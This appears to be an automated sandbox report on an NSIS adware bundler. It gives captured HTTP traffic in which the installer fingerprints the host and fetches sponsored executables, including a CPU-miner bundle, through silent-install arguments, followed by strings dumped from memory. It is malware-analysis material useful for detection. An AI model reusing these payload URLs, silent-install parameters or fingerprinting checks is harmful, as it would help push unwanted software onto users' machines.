HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Wed, 23 Sep 2015 14:45:45 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 202
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXps://s3.amazonaws.com/cf_vopackage/SysInfo/SearchUpdater.exe&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Wed, 23 Sep 2015 14:45:45 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Wed, 23 Sep 2015 14:45:45 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 187
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://VVV.software-forus.com/CPUminer/v6/Bundle_CPUminer.exe&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Wed, 23 Sep 2015 14:45:46 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Wed, 23 Sep 2015 14:45:46 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Wed, 23 Sep 2015 14:45:49 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 199
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://dl.taxideataxus.com/download/dwn/prq4633/este/re/setup_gmsd_re.exe&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Wed, 23 Sep 2015 14:45:59 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Wed, 23 Sep 2015 14:45:59 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 212
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://dl.taxideataxus.com/download/dwn/prq4633/este/re/setup_gmsd_re.exe&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Wed, 23 Sep 2015 14:46:12 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Wed, 23 Sep 2015 14:46:12 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 170
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d10huri5h4o4a3.cloudfront.net/smt.exe&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Wed, 23 Sep 2015 14:46:12 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Wed, 23 Sep 2015 14:46:12 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}..
GET /binsis/get_pre_offering_checks?uid=0935018A1F474F0AA5C4C276D894F821&v=2.2.2&v1=U2VyaWFsTnVtYmVyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWZXJzaW9uICAgICAgICAgICANDQpWTXdhcmUtNTYgNGQgNzAgMTMgYjYgYzEgMWMgYmQtYjAgMjkgOWEgMWYgNzggZmQgNTUgYTMgIElOVEVMICAtIDYwNDAwMDA&affid=vuupcntmb&sid=vuupculwo&s=0 HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: d3oxtn1x3b8d7i.cloudfront.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Server: nginx
Date: Wed, 23 Sep 2015 14:46:15 GMT
Expires: Wed, 23 Sep 2015 11:59:35 GMT
Cache-Control: no-cache
Vary: Accept-Encoding
X-Cache: Miss from cloudfront
Via: 1.1 7ab285f149f01a2b05c04a9ee64a602f.cloudfront.net (CloudFront)
X-Amz-Cf-Id: IlRn1iI8yNkg7CAhLe0YKafcVT2a032wv4FX1FIy-qDhiFBwI7HL-Q==
86b8..<?xml version="1.0"?>.<pre_offering_checks><check type="registry" return_name="check_4" return_value_type="boolean"><value_to_check><key>HKCU\Software\Somoto\SDP</key><name>uid</name></value_to_check></check><check type="registry" return_name="check_586" return_value_type="boolean"><value_to_check><key>HKCU\Software\WebPlayer</key><name>AppsHat</name></value_to_check></check><check type="registry" return_name="check_1842" return_value_type="boolean"><value_to_check><key>HKCU\Software\WebPlayer\AppsHat</key><name>version</name></value_to_check></check><check type="registry" return_name="check_2182" return_value_type="boolean"><value_to_check><key>HKLM\SOFTWARE\Goobzo\YouTube Accelerator</key><name>version</name></value_to_check></check><check type="registry" return_name="check_2246" return_value_type="boolean"><value_to_check><key>HKLM\SOFTWARE\YTDownloader</key><name>version</name></value_to_check></check><check type="registry" return_name="check_2450" return_value_type="boolean"><value_to_check><key>HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\HotspotShield</key><name>DisplayName</name></value_to_check></check><check type="registry" return_name="check_3850" return_value_type="boolean"><val
<<< skipped >>>
POST /binsis/xml?uid=0935018A1F474F0AA5C4C276D894F821&v=2.2.2&v1=U2VyaWFsTnVtYmVyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWZXJzaW9uICAgICAgICAgICANDQpWTXdhcmUtNTYgNGQgNzAgMTMgYjYgYzEgMWMgYmQtYjAgMjkgOWEgMWYgNzggZmQgNTUgYTMgIElOVEVMICAtIDYwNDAwMDA&affid=vuupcntmb&sid=vuupculwo&s=0 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Filename: nsd38.tmp
User-Agent: NSIS_Inetc (Mozilla)
Host: d3oxtn1x3b8d7i.cloudfront.net
Content-Length: 8804
Connection: Keep-Alive
Cache-Control: no-cache
installer_data={"uid":"0935018A1F474F0AA5C4C276D894F821","muid":"9e10bdd7664ab688d1d7f2ab0b148110","affid":"vuupcntmb","sid":"vuupculwo","installerVersion":"2.2.2","osVersion":"5.1.2600 32bit","ieVersion":"6.0.2900.5512","ff_installed":"0","ff_version":"","ff_default_homepage":"not_found","ff_is_default":"0","ie_installed":"1","ie_version":"6.0.2900.5512","ie_default_homepage":"about:blank","ie_is_default":"0","chrome_installed":"0","chrome_version":"","chrome_default_homepage":"not_found","chrome_is_default":"0","opera_installed":"0","opera_version":"","opera_default_homepage":"not_found","opera_is_default":"0","safari_installed":"0","safari_version":"","safari_default_homepage":"not_found","safari_is_default":"0","check_4":"false","check_586":"false","check_1842":"false","check_2182":"false","check_2246":"false","check_2450":"false","check_3850":"false","check_1282":"false","check_1284":"false","check_1522":"false","check_1592":"false","check_1634":"false","check_1788":"false","check_1790":"false
HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Server: nginx
Date: Wed, 23 Sep 2015 14:46:22 GMT
Vary: Accept-Encoding
Expires: Wed, 23 Sep 2015 11:59:42 GMT
Cache-Control: no-cache
X-Cache: Miss from cloudfront
Via: 1.1 7ab285f149f01a2b05c04a9ee64a602f.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 3jxHjyquO_fF9KCq5fQkbbLoGIbDAI9abE9qj7UF-NDUsL53YbzOxA==
1778..<?xml version="1.0" encoding="windows-1252"?>.<sponsored_data><downloader><url>hXXp://sub.spirlymo.com/installers/bi_downloader/1443013514595/setup.exe</url><downloadOnInit>1</downloadOnInit><args>/silent /initurl hXXp://sub.yorkshatb.com/downloader/:affid:/:sid:/:uid:? -uid="%UID%" -sid="%SoftwareID%" -affid="¯filiateID%" -muid="%MUID%"</args></downloader><offers><offer id="istartsurf"><remote_resources/><downloader><args>_!delimiter!_ -offerId="%OfferID%" -softwareName="Istartsurf"</args></downloader><title>Special Offer</title><sub_title>To go along with your Vuupc</sub_title><download_url>hXXp://d2drfrdurj6mvo.cloudfront.net/liyan/smt_istartsurf.exe</download_url><execution_arguments>-silence -ptid=smt</execution_arguments><options><option type="v_space" height="5"/><option type="text" width="100"><id>descriptionElement</id><text><decor type="text">Make Istartsurf my browser homepage, default search and new tab</decor></text></option><option type="v_space" height="5"/><option type="text" width="100"><id>footerElement</id><text><decor type="text">By clicking Next you are agreeing to Istartsurf</decor><decor type="link" href="hXXp://VVV.istartsurf.com/license_agreement.html">Terms of Use</decor><decor type="text">and</decor><de
<<< skipped >>>
GET /crossbrowse/ie/107/ie.zip.001 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: zip.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Wed, 23 Sep 2015 14:45:44 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1441008912"
Last-Modified: Mon, 31 Aug 2015 08:15:12 GMT
Cache-Control: max-age=69471
Content-Length: 8244985
Content-Type: text/plain; charset=UTF-8
X-HW: 1443019545.dop001.fr7.t,1443019544.cds027.fr7.c
PK........l..G...nd.T.d.T.....chrome.packed.7z7z..'.....T...T.............*..F......8%D.cT(g.....,r...E^<5....S$<....Z..*...7&.o.,.a&......%...1..5...m...h..=w.|.a.a.Q.{.<..:..9Q,>n...k.....~..aJ.._...KD.V...7.>..3....d......)..6.H..RN...:.....FU.!..j...9....L.&.2.a........ .E.s'T.......vD.z)..}..-.. .&.vF}.$.z.......lw.>..!...'.a..|...L....09E..Y8^.s.O\..C..%.......d.VD....W..d.'..6%...l.7Gk.<..I...5...d !......wT...d...H..7v.E.......{.p.]`.......~w84.rj......;...).q.k..G...........zL...{....>.."........"q..k[.f...F{8...s..c>[69..|...q].(.S..~..1z..>.!AT&i.}....YJ....\i....o..(...4.5.......h|.......6.!...4.p[....@.m.. ^&...A..&E..V.]...T=.v]W.l=A=y.T....R.'f.....60..MR...k...c.1."..jw.7C.N...b....@...@....%..%*!5............iW*y..*......E...D....6....3.P....2.....} .'..!...cG.m...Z.]%{.QZ./e.V-C.a.X.aQ?.....S..1...:.T..C*..hKH....(...aH.r..;..^.l.ikR.X..8..._...^T{B@..'.tga.3."..<. ...........$c9......... .~)/..%.2{...X&.W.....>...bh.L.....U.-.Vf......r..d..9. ..k.'.M...J...v...rU..`3...SWX...G1.`....{.....8.~..x..Q...g.._...1.9.......f8..#p..............]...E.(....J....(H.h..6@'.hc.5....}.1>{..6/.R.....(X.k.<....\.....:p...u..L.....h...K...vaK./.O........'|...8..2...{..9....."&.......Z..K.eJ..4e..)v..[...J$.e........5.G......X..@.o.^Y...%....._.n.:...\......H...0,.f.E...*M.F.f.R.lJ*,...S.....FE*'b.#V.@........a=._.....W... .}.....p.~..(>.....E.1k....3k....F..[.T...,N...............Y7.......G[....rH).E......[.5..K..Q..J#8.-.@.]<eh........2a.c.8...Z....O.....z..2c
<<< skipped >>>
GET /crossbrowse/ie/107/ie.zip.005 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: zip.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Wed, 23 Sep 2015 14:45:45 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1441008913"
Last-Modified: Mon, 31 Aug 2015 08:15:13 GMT
Cache-Control: max-age=69450
Content-Length: 8244985
Content-Type: text/plain; charset=UTF-8
X-HW: 1443019545.dop003.fr7.t,1443019545.cds036.fr7.c
[..Wa<.3.......Y.}S.Q)|.x.P..r._ip`...h.r...@..k.....8..o.D_C.0.h..M...gv......J..g.....a.4..~....A.Y.. .u:7..... i...$.....p...ORP.P... ....._.@......?.F.....8.@..l....{n...XGi......2..........FOqM..N_.}...S*he.I.q.. ..V...=.E....1....M.S.......f3%.?.....Ug.\.}...I..g..w..[....t..yR..DJ3.;.;W...._.....y.:..XZ<..40a.I..A...vUW..,...u"......>..*.....@D...YX.4.......v]...T.$..T.1...2.X..o.X....@.%...n.LL....-..A...n.......uq<.r$..t`M.:c9C..l./....}2.......{.O...7............;...M..x...rwqL.\.. ..b.........*f!..S|..*g...'dl..........eN..km...:.6.....s....n.5..0_r8 D.W...".S/%r.rU..c.......C.v5..C...3..z....\.B.-a..r......|..G..W.....2h..>jSy....Z.........tE...T....R.2...p..Q>...f.fj.#.Z.l....7..h.....>...-..K...<....?....B..........,.....$..~........^..V...Uq.672kCC......i....J....*...K.......0..14....{.Wwf".K.p....;.6.H."6y.q.E~. i.`...hN.....d../\A....hY.$!}3..7.*&.n......Z...Q>W.......`0.q..M..A@*.Y 0..7l"m......0...4..X2.|.C2j.[..K...gu...?.a..s.B.kX......j.t...B@|d.l._.zZ.. ."D(..PD..l?.%..w.....).v,v9m...w........G..C.SU.l7*JlW.....56.....v..{............G..3..0....R......Y.h,u..k.'.....$..&.[.9.. 8..1..DZF....n......l_.......*.R...Q$.3.q\..'...]...k..*..0....^#.|A.v...K...........T.Q.#...^e.c....V\..ysD.Ai^.ly..P.~..lreD.g_.Q.....i..kS.R...f..=9.9..q=D."......-N...C.....%.-..u.....<.qj..:..s......:>.I`.PJ..vQ.K.....o.)qew.K.G....w.....tJ.a4...L.[.......0.0#.),......7....J}*..^`w..Q.h...~e..Ql..*..|}...K.Z.*..'.....|..rp.@_.b..!..R.%....%..m"....W9..$ 1.......VZ..''.1,|..V...
<<< skipped >>>
GET /installer.gif?action=started&ibic=c34de9db4800cc5c07ea55982373e9fd&verifier=394e163cb9e37b27c10848a9a1e45ae5&os=XP32&chver=X&ffver=X&iever=6&app=12345&srcid=003266&default=ie&ver=107&crtnm=OralTeams&rnd=7900 HTTP/1.1
Accept: */*
Host: mystats.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: xADMoDMJhqOe8NeucMtqBdnuniNBGZBxq8VTTQHozVDXRfUyXX6f2OOqld pGV0v1bcs7guygP0=
x-amz-request-id: B610C6DCFEB96A4D
Date: Wed, 23 Sep 2015 14:45:45 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:41 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: xADMoDMJhqOe8NeucMtqBdnuniNBGZBxq8VTTQHozVDXRfUyXX6f2OOqld pGV0v1bcs7guygP0=..x-amz-request-id: B610C6DCFEB96A4D..Date: Wed, 23 Sep 2015 14:45:45 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalidate..Last-Modified: Wed, 17 Jun 2015 13:20:41 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;..
Map
The SpyTool connects to the servers at the folowing location(s):
Strings from Dumps
nsjA.tmp_1028:
.text
.text
`.rdata
`.rdata
@.data
@.data
.ndata
.ndata
.rsrc
.rsrc
uDSSh
uDSSh
.DEFAULT\Control Panel\International
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
ExitWindowsEx
ExitWindowsEx
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
SHFileOperationA
SHFileOperationA
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
RegEnumKeyA
RegEnumKeyA
RegCreateKeyExA
RegCreateKeyExA
RegCloseKey
RegCloseKey
RegDeleteKeyA
RegDeleteKeyA
RegOpenKeyExA
RegOpenKeyExA
ADVAPI32.dll
ADVAPI32.dll
COMCTL32.dll
COMCTL32.dll
ole32.dll
ole32.dll
VERSION.dll
VERSION.dll
verifying installer: %d%%
verifying installer: %d%%
unpacking data: %d%%
unpacking data: %d%%
... %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
~nsu.tmp
%u.%u%s%s
%u.%u%s%s
RegDeleteKeyExA
RegDeleteKeyExA
%s=%s
%s=%s
*?|/":
*?|/":
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsm34.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsm34.tmp
360TotalSecurity.exe
360TotalSecurity.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsz10.tmp\inetc.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsz10.tmp\inetc.dll
hXXp://d10huri5h4o4a3.cloudfront.net/smt.exe
hXXp://d10huri5h4o4a3.cloudfront.net/smt.exe
33/este/re/setup_gmsd_re.exe&errorlevel=0
33/este/re/setup_gmsd_re.exe&errorlevel=0
hXXp://download-servers.com/partners/360/360TotalSecurity.exe
hXXp://download-servers.com/partners/360/360TotalSecurity.exe
u.Uj@
u.Uj@
MSVCRT.dll
MSVCRT.dll
HttpSendRequestA
HttpSendRequestA
HttpSendRequestExA
HttpSendRequestExA
HttpQueryInfoA
HttpQueryInfoA
FtpCreateDirectoryA
FtpCreateDirectoryA
FtpOpenFileA
FtpOpenFileA
HttpOpenRequestA
HttpOpenRequestA
HttpAddRequestHeadersA
HttpAddRequestHeadersA
HttpEndRequestA
HttpEndRequestA
InternetCrackUrlA
InternetCrackUrlA
WININET.dll
WININET.dll
inetc.dll
inetc.dll
Open URL Error
Open URL Error
URL Parts Error
URL Parts Error
FtpCreateDir failed (550)
FtpCreateDir failed (550)
Error FTP path (550)
Error FTP path (550)
Downloading %s
Downloading %s
%dkB (%d%%) of %dkB @ %d.dkB/s
%dkB (%d%%) of %dkB @ %d.dkB/s
(%d %s%s remaining)
(%d %s%s remaining)
REST %d
REST %d
SIZE %s
SIZE %s
Content-Length: %d
Content-Length: %d
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
Authorization: basic %s
Authorization: basic %s
Proxy-authorization: basic %s
Proxy-authorization: basic %s
%s:%s
%s:%s
FtpCommandA
FtpCommandA
wininet.dll
wininet.dll
%u MB
%u MB
%u kB
%u kB
%u bytes
%u bytes
%d:d:d
%d:d:d
%s - %s
%s - %s
(Err=%d)
(Err=%d)
NSIS_Inetc (Mozilla)
NSIS_Inetc (Mozilla)
Filename: %s
Filename: %s
/password
/password
Uploading %s
Uploading %s
8!8-8B8I8}8
8!8-8B8I8}8
@.reloc
@.reloc
S.NH^
S.NH^
pq.ucy
pq.ucy
UX.ei
UX.ei
%xsdA
%xsdA
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd35.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd35.tmp
nsd35.tmp
nsd35.tmp
://livestatscounter.com/Generic/vos.php?ch=
://livestatscounter.com/Generic/vos.php?ch=
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsjA.tmp /idn
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsjA.tmp /idn
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsm34.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsm34.tmp
Uninstall.exe
Uninstall.exe
n.php?r=vu_vo2_
n.php?r=vu_vo2_
d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe
d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsjA.tmp /idn
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsjA.tmp /idn
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp
nsjA.tmp
nsjA.tmp
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsuE.tmp
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsuE.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsz10.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsz10.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsjA.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsjA.tmp
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d10huri5h4o4a3.cloudfront.net/smt.exe&v=2\"}"}
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d10huri5h4o4a3.cloudfront.net/smt.exe&v=2\"}"}
e/setup_gmsd_re.exe&errorlevel=0&v=2\"}"}
e/setup_gmsd_re.exe&errorlevel=0&v=2\"}"}
hXXp://ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
hXXp://ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
url=hXXp://d10huri5h4o4a3.cloudfront.net/smt.exe
url=hXXp://d10huri5h4o4a3.cloudfront.net/smt.exe
/este/re/setup_gmsd_re.exe
/este/re/setup_gmsd_re.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsw13.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsw13.tmp
dlgen.php?r=vu_vo2_
dlgen.php?r=vu_vo2_
)-.Yln
)-.Yln
Nullsoft Install System v2.46
Nullsoft Install System v2.46
1.0.0.1
1.0.0.1
upgmsd_re_005010095.exe_436:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.reloc
@.reloc
RSSSSSSh
RSSSSSSh
QSShh
QSShh
tFHt:Ht.Ht"Hu`
tFHt:Ht.Ht"Hu`
SSSShp
SSSShp
SSSSh
SSSSh
u$SShe
u$SShe
tWSShW
tWSShW
tl9_ tgSSh
tl9_ tgSSh
t'SShl
t'SShl
SSSShxjn
SSSShxjn
j%XtL9E
j%XtL9E
FtPW
FtPW
SSh@B
SSh@B
u.SSh
u.SSh
tsSSh
tsSSh
FTCP
FTCP
t.WWWSP
t.WWWSP
tAHt.HHt
tAHt.HHt
FTPS
FTPS
u)SShF
u)SShF
s%j.Zf
s%j.Zf
xSSSh
xSSSh
FTPjKS
FTPjKS
FtPj;S
FtPj;S
C.PjRV
C.PjRV
operand of unlimited repeat could match the empty string
operand of unlimited repeat could match the empty string
POSIX named classes are supported only within a class
POSIX named classes are supported only within a class
erroffset passed as NULL
erroffset passed as NULL
POSIX collating elements are not supported
POSIX collating elements are not supported
this version of PCRE is not compiled with PCRE_UTF8 support
this version of PCRE is not compiled with PCRE_UTF8 support
PCRE does not support \L, \l, \N, \U, or \u
PCRE does not support \L, \l, \N, \U, or \u
support for \P, \p, and \X has not been compiled
support for \P, \p, and \X has not been compiled
(*VERB) with an argument is not supported
(*VERB) with an argument is not supported
!"#$%&'((()* ,-./01
!"#$%&'((()* ,-./01
CNotSupportedException
CNotSupportedException
CCmdTarget
CCmdTarget
RegOpenKeyTransactedW
RegOpenKeyTransactedW
RegCreateKeyTransactedW
RegCreateKeyTransactedW
RegDeleteKeyTransactedW
RegDeleteKeyTransactedW
CFtpFileFind
CFtpFileFind
CHttpConnection
CHttpConnection
CFtpConnection
CFtpConnection
CHttpFile
CHttpFile
RegDeleteKeyExW
RegDeleteKeyExW
TaskDialogIndirect
TaskDialogIndirect
CMDITabProxyWnd
CMDITabProxyWnd
CMDIChildWndEx
CMDIChildWndEx
CMDIFrameWndEx
CMDIFrameWndEx
CMDIChildWnd
CMDIChildWnd
CMDIFrameWnd
CMDIFrameWnd
CMDIClientAreaWnd
CMDIClientAreaWnd
CHotKeyCtrl
CHotKeyCtrl
CMFCToolBarsKeyboardPropertyPage
CMFCToolBarsKeyboardPropertyPage
GetProcessWindowStation
GetProcessWindowStation
operator
operator
portuguese-brazilian
portuguese-brazilian
qR.Rd
qR.Rd
Visual C CRT: Not enough memory to complete call to strerror.
Visual C CRT: Not enough memory to complete call to strerror.
Broken pipe
Broken pipe
Inappropriate I/O control operation
Inappropriate I/O control operation
Operation not permitted
Operation not permitted
%%X
%%X
RegSetKeySecurity error! (rc=%lu)
RegSetKeySecurity error! (rc=%lu)
Key not found.
Key not found.
Error opening key.
Error opening key.
ntdll.dll
ntdll.dll
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
LookupPrivilegeValue error: %u
LookupPrivilegeValue error: %u
Error %d: Could not begin update of %s
Error %d: Could not begin update of %s
Error %d: Updating resource
Error %d: Updating resource
!"#$%&'()* ,-./:;?@[\]^_`{|}~
!"#$%&'()* ,-./:;?@[\]^_`{|}~
C:\appbuilder_2.0_multiinstall\Release\temp.pdb
C:\appbuilder_2.0_multiinstall\Release\temp.pdb
IPHLPAPI.DLL
IPHLPAPI.DLL
PSAPI.DLL
PSAPI.DLL
GetProcessHeap
GetProcessHeap
GetWindowsDirectoryW
GetWindowsDirectoryW
GetCPInfo
GetCPInfo
KERNEL32.dll
KERNEL32.dll
GetKeyState
GetKeyState
SetWindowsHookExW
SetWindowsHookExW
CreateDialogIndirectParamW
CreateDialogIndirectParamW
UnhookWindowsHookEx
UnhookWindowsHookEx
MsgWaitForMultipleObjectsEx
MsgWaitForMultipleObjectsEx
GetAsyncKeyState
GetAsyncKeyState
MapVirtualKeyW
MapVirtualKeyW
GetKeyboardLayout
GetKeyboardLayout
GetKeyboardState
GetKeyboardState
GetKeyNameTextW
GetKeyNameTextW
MapVirtualKeyExW
MapVirtualKeyExW
EnumChildWindows
EnumChildWindows
USER32.dll
USER32.dll
GetViewportExtEx
GetViewportExtEx
SetViewportOrgEx
SetViewportOrgEx
OffsetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
SetViewportExtEx
ScaleViewportExtEx
ScaleViewportExtEx
GetViewportOrgEx
GetViewportOrgEx
GDI32.dll
GDI32.dll
MSIMG32.dll
MSIMG32.dll
COMDLG32.dll
COMDLG32.dll
WINSPOOL.DRV
WINSPOOL.DRV
RegLoadKeyW
RegLoadKeyW
RegUnLoadKeyW
RegUnLoadKeyW
RegOpenKeyExW
RegOpenKeyExW
RegCloseKey
RegCloseKey
RegCreateKeyExW
RegCreateKeyExW
RegSetKeySecurity
RegSetKeySecurity
RegDeleteKeyW
RegDeleteKeyW
RegEnumKeyExW
RegEnumKeyExW
